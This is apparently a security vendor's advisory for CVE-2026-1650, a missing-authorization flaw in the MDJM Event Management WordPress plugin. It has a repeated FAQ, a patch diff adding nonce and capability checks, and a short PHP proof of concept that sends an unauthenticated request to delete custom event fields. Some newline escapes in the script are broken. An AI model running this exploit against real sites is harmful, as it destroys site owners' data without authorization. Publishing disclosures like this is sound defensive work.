What is CVE-2026-1650?

CVE-2026-1650 is a security vulnerability in the MDJM Event Management plugin for WordPress, specifically versions up to and including 1.7.8.1. It is caused by a missing authorization check that allows unauthenticated users to delete arbitrary custom event fields.

How does the vulnerability work?

The vulnerability exists in the ‘custom_fields_controller’ function, which processes requests to delete custom event fields. Without proper capability checks or nonce verification, an attacker can send a crafted HTTP GET request to delete fields by specifying the field ID.

Who is affected by this vulnerability?

Any WordPress site using the MDJM Event Management plugin version 1.7.8.1 or earlier is affected. Administrators should check their plugin version to determine if they need to take action.

How can I check if my site is vulnerable?

To check if your site is vulnerable, log in to your WordPress admin panel, navigate to the plugins section, and look for the MDJM Event Management plugin. Verify that the version is 1.7.8.1 or lower.

How can I fix this vulnerability?

The recommended solution is to update the MDJM Event Management plugin to version 1.7.8.2 or later, which includes a patch for this vulnerability. Always ensure that you keep your plugins updated to the latest versions.

What are the risks associated with this vulnerability?

The vulnerability has a medium severity rating with a CVSS score of 5.3. Successful exploitation can lead to unauthorized deletion of custom event fields, potentially disrupting event management workflows and causing data inconsistency.

What does the CVSS score indicate?

The CVSS score of 5.3 indicates a medium level of risk. This suggests that while the vulnerability is not critical, it can still have significant implications if exploited, particularly for sites relying heavily on custom event fields.

What security measures were added in the patch?

The patch for CVE-2026-1650 introduced nonce verification and capability checks. Specifically, it requires a valid nonce for deletion requests and checks if the user has the ‘manage_mdjm’ capability before allowing field deletion.

How does the proof of concept demonstrate the vulnerability?

The proof of concept provides a PHP script that constructs a request to the vulnerable endpoint without requiring authentication. It demonstrates how an attacker can delete a custom field by simply sending a crafted request to the plugin’s admin interface.

What should I do if I cannot update the plugin immediately?

If you cannot update the plugin immediately, consider restricting access to the WordPress admin area or disabling the MDJM Event Management plugin until a secure version can be applied. Additionally, monitor logs for any unauthorized access attempts.

Are there any other vulnerabilities related to this plugin?

As of now, CVE-2026-1650 is the primary known vulnerability affecting the MDJM Event Management plugin. However, it is advisable to regularly check for updates and security advisories related to all plugins in use.

How can I stay informed about future vulnerabilities?

To stay informed about future vulnerabilities, subscribe to security mailing lists, follow security blogs, and regularly check the National Vulnerability Database (NVD) or similar resources for updates on WordPress plugins.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2026-1650: MDJM Event Management <= 1.7.8.1 – Missing Authorization to Unauthenticated Arbitrary Custom Event Field Deletion (mobile-dj-manager)

CVE ID CVE-2026-1650

Plugin mobile-dj-manager

Severity Medium (CVSS 5.3)

CWE 862

Vulnerable Version 1.7.8.1

Patched Version 1.7.8.2

Disclosed March 5, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-1650:
The vulnerability is a missing authorization and nonce verification flaw in the MDJM Event Management plugin. The root cause is the `custom_fields_controller` function in `/mobile-dj-manager/includes/admin/pages/event-fields.php`. This function processes requests to delete custom event fields via the `delete_custom_field` and `id` GET parameters. The vulnerable code version (<=1.7.8.1) lacks both a capability check and a nonce verification before calling the `delete_field()` method. This allows any unauthenticated user to send a crafted HTTP GET request to the WordPress admin page endpoint for custom event fields, triggering the deletion of arbitrary custom fields by specifying a target field ID. The attack vector is a direct request to the plugin's admin interface page, typically accessed via `/wp-admin/admin.php?page=mdjm-custom-event-fields`. The exploit requires the `delete_custom_field` parameter set to `1` and the `id` parameter set to the numeric ID of the custom field to delete. The patch adds two security measures. First, it introduces a nonce check using `wp_verify_nonce` for the `_wpnonce` parameter, scoped to the specific field ID. Second, it adds a capability check (`current_user_can('manage_mdjm')`) to ensure the user has the appropriate administrative privilege. The patch also updates the delete link generation in the admin UI to include a nonce via `wp_nonce_url`. Successful exploitation allows an attacker to delete custom event field definitions, potentially disrupting event management workflows and causing data inconsistency.

Differential between vulnerable and patched code

Code Diff

--- a/mobile-dj-manager/includes/admin/pages/event-fields.php
+++ b/mobile-dj-manager/includes/admin/pages/event-fields.php
@@ -89,20 +89,45 @@
 		function custom_fields_controller()
 		{
 			if (isset($_POST['submit_custom_field'])) {
+				// Verify nonce
+				if (
+					!isset($_POST['mdjm_custom_field_nonce']) ||
+					!wp_verify_nonce($_POST['mdjm_custom_field_nonce'], 'mdjm_custom_field_action')
+				) {
+					wp_die(__('Security check failed', 'mobile-dj-manager'));
+				}
+
+				// Check permissions
+				if (!current_user_can('manage_mdjm')) {
+					wp_die(__('You do not have permission to perform this action', 'mobile-dj-manager'));
+				}
+
 				if ($_POST['submit_custom_field'] == __('Add Field', 'mobile-dj-manager')) {
 					$this->add_field();
-
 				} elseif ($_POST['submit_custom_field'] == __('Save Changes', 'mobile-dj-manager')) {
 					$this->update_field();
 				}
 			}

 			if (isset($_GET['delete_custom_field'], $_GET['id'])) {
+				// Verify nonce
+				if (
+					!isset($_GET['_wpnonce']) ||
+					!wp_verify_nonce($_GET['_wpnonce'], 'delete_custom_field_' . absint($_GET['id']))
+				) {
+					wp_die(__('Security check failed', 'mobile-dj-manager'));
+				}
+
+				// Check permissions
+				if (!current_user_can('manage_mdjm')) {
+					wp_die(__('You do not have permission to perform this action', 'mobile-dj-manager'));
+				}
+
 				$this->delete_field();
 			}

 			return;
-		} // custom_fields_controller
+		}

 		/**
 		 * Display a list of custom shortcodes.
@@ -351,7 +376,7 @@
 					/**
 					 * Display the Custom fields
 					 */
-					$field_types = apply_filters('mdjm_custom_field_groups', array('client', 'event', 'venue' ));
+					$field_types = apply_filters('mdjm_custom_field_groups', array('client', 'event', 'venue'));

 					foreach ($field_types as $field_type) {
 						?>
@@ -396,9 +421,10 @@
 											<td>
 												<a href="<?php echo esc_url(mdjm_get_admin_page('custom_event_fields') . '&edit_custom_field=1&id=' . $fields->post->ID); ?>"
 													class="button button-primary button-small"><?php esc_html_e('Edit', 'mobile-dj-manager'); ?></a>
-												   <a
-													href="<?php echo esc_url(mdjm_get_admin_page('custom_event_fields') . '&delete_custom_field=1&id=' . $fields->post->ID); ?>"
-													class="button button-secondary button-small"><?php esc_html_e('Delete', 'mobile-dj-manager'); ?></a>
+												   <a href="<?php echo esc_url(wp_nonce_url(
+													mdjm_get_admin_page('custom_event_fields') . '&delete_custom_field=1&id=' . $fields->post->ID,
+													'delete_custom_field_' . $fields->post->ID
+												)); ?>" class="button button-secondary button-small"><?php esc_html_e('Delete', 'mobile-dj-manager'); ?></a>
 											</td>
 										</tr>
 										<?php
@@ -477,6 +503,7 @@
 			<div class="mdjm-event-field-column-right">
 				<form name="mdjm-custom-event-fields" id="mdjm-custom-event-fields" method="post"
 					action="<?php echo esc_url(mdjm_get_admin_page('custom_event_fields')); ?>">
+					<?php wp_nonce_field('mdjm_custom_field_action', 'mdjm_custom_field_nonce'); ?>

 					<?php
 					if (isset($_GET['edit_custom_field'], $_GET['id'])) {
@@ -562,17 +589,16 @@
 							<label
 								for="_mdjm_field_options"><?php esc_html_e('Selectable Options', 'mobile-dj-manager'); ?>:</label><br />
 							<textarea name="_mdjm_field_options" id="_mdjm_field_options" class="all-options" rows="5">
-							<?php
-							echo (!empty($editing) ? esc_html(get_post_meta(absint(wp_unslash($_GET['id'])), '_mdjm_field_options', true)) : '');
-							?>
-								</textarea><br />
+																<?php
+																echo (!empty($editing) ? esc_html(get_post_meta(absint(wp_unslash($_GET['id'])), '_mdjm_field_options', true)) : '');
+																?>
+																	</textarea><br />
 							<span class="description"><?php esc_html_e('One entry per line', 'mobile-dj-manager'); ?></span>
 						</p>
 					</div>
 					<div id="value_field_checkbox">
 						<p>
-							<label
-								for="_mdjm_field_value"><?php esc_html_e('Checked Value', 'mobile-dj-manager'); ?>:</label><br />
+							<label for="_mdjm_field_value"><?php esc_html_e('Checked Value', 'mobile-dj-manager'); ?>:</label><br />
 							<input type="text" name="_mdjm_field_value" id="_mdjm_field_value" value="
 				<?php
 				echo (!empty($editing) ?
--- a/mobile-dj-manager/includes/class-mdjm-stats.php
+++ b/mobile-dj-manager/includes/class-mdjm-stats.php
@@ -418,7 +418,7 @@
 					if ( ! $end_date ) {
 						$month = 1;
 					} else {
-						$month  = 11;
+						$month  = 12;
 						$day    = date( 't' , mktime( 0, 0, 0, $month, 1, $year ) );
 						$hour   = 23;
 						$minute = 59;
--- a/mobile-dj-manager/mobile-dj-manager.php
+++ b/mobile-dj-manager/mobile-dj-manager.php
@@ -4,8 +4,8 @@
  * Plugin Name: MDJM Event Management
  * Plugin URI: https://www.mdjm.co.uk
  * Description: The flexible event management solution for WordPress - not just for DJs!
- * Version: 1.7.8.1
- * Date: January 2026
+ * Version: 1.7.8.2
+ * Date: February 2026
  * Author: MDJM <info@mdjm.co.uk>
  * Author URI:  https://mdjm.co.uk
  * Text Domain: mobile-dj-manager
@@ -147,7 +147,7 @@
 		{
 			global $wpdb;

-			define('MDJM_VERSION_NUM', '1.7.8.1');
+			define('MDJM_VERSION_NUM', '1.7.8.2');
 			define('MDJM_VERSION_KEY', 'mdjm_version');
 			define('MDJM_PLUGIN_DIR', untrailingslashit(__DIR__));
 			define('MDJM_PLUGIN_URL', untrailingslashit(plugins_url('', __FILE__)));

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-1650 - MDJM Event Management <= 1.7.8.1 - Missing Authorization to Unauthenticated Arbitrary Custom Event Field Deletion
<?php
$target_url = 'http://target-site.com/wp-admin/admin.php';
$field_id = 123; // Replace with the numeric ID of the custom field to delete

// Construct the vulnerable endpoint with required parameters
$url = $target_url . '?page=mdjm-custom-event-fields&delete_custom_field=1&id=' . $field_id;

// Initialize cURL session
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
// The vulnerability does not require authentication or a nonce.
// A successful request will trigger the deletion and may return a WordPress admin page or error.
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

echo "HTTP Status: $http_coden";
// Check if the request reached the plugin's handler.
// A 200 OK or a redirect to a login page (if not authenticated) are common responses.
if ($http_code == 200) {
    echo "Request sent. The custom field with ID $field_id may have been deleted.n";
} else {
    echo "Request failed with HTTP code $http_code.n";
}
?>

Frequently Asked Questions

What is CVE-2026-1650?
Understanding the vulnerability
CVE-2026-1650 is a security vulnerability in the MDJM Event Management plugin for WordPress, specifically versions up to and including 1.7.8.1. It is caused by a missing authorization check that allows unauthenticated users to delete arbitrary custom event fields.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability exists in the ‘custom_fields_controller’ function, which processes requests to delete custom event fields. Without proper capability checks or nonce verification, an attacker can send a crafted HTTP GET request to delete fields by specifying the field ID.
Who is affected by this vulnerability?
Identifying at-risk users
Any WordPress site using the MDJM Event Management plugin version 1.7.8.1 or earlier is affected. Administrators should check their plugin version to determine if they need to take action.
How can I check if my site is vulnerable?
Version verification process
To check if your site is vulnerable, log in to your WordPress admin panel, navigate to the plugins section, and look for the MDJM Event Management plugin. Verify that the version is 1.7.8.1 or lower.
How can I fix this vulnerability?
Applying the patch
The recommended solution is to update the MDJM Event Management plugin to version 1.7.8.2 or later, which includes a patch for this vulnerability. Always ensure that you keep your plugins updated to the latest versions.
What are the risks associated with this vulnerability?
Understanding the severity
The vulnerability has a medium severity rating with a CVSS score of 5.3. Successful exploitation can lead to unauthorized deletion of custom event fields, potentially disrupting event management workflows and causing data inconsistency.
What does the CVSS score indicate?
Interpreting the score
The CVSS score of 5.3 indicates a medium level of risk. This suggests that while the vulnerability is not critical, it can still have significant implications if exploited, particularly for sites relying heavily on custom event fields.
What security measures were added in the patch?
Improvements made
The patch for CVE-2026-1650 introduced nonce verification and capability checks. Specifically, it requires a valid nonce for deletion requests and checks if the user has the ‘manage_mdjm’ capability before allowing field deletion.
How does the proof of concept demonstrate the vulnerability?
Exploit example
The proof of concept provides a PHP script that constructs a request to the vulnerable endpoint without requiring authentication. It demonstrates how an attacker can delete a custom field by simply sending a crafted request to the plugin’s admin interface.
What should I do if I cannot update the plugin immediately?
Temporary mitigation strategies
If you cannot update the plugin immediately, consider restricting access to the WordPress admin area or disabling the MDJM Event Management plugin until a secure version can be applied. Additionally, monitor logs for any unauthorized access attempts.
Are there any other vulnerabilities related to this plugin?
Broader security context
As of now, CVE-2026-1650 is the primary known vulnerability affecting the MDJM Event Management plugin. However, it is advisable to regularly check for updates and security advisories related to all plugins in use.
How can I stay informed about future vulnerabilities?
Keeping updated
To stay informed about future vulnerabilities, subscribe to security mailing lists, follow security blogs, and regularly check the National Vulnerability Database (NVD) or similar resources for updates on WordPress plugins.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations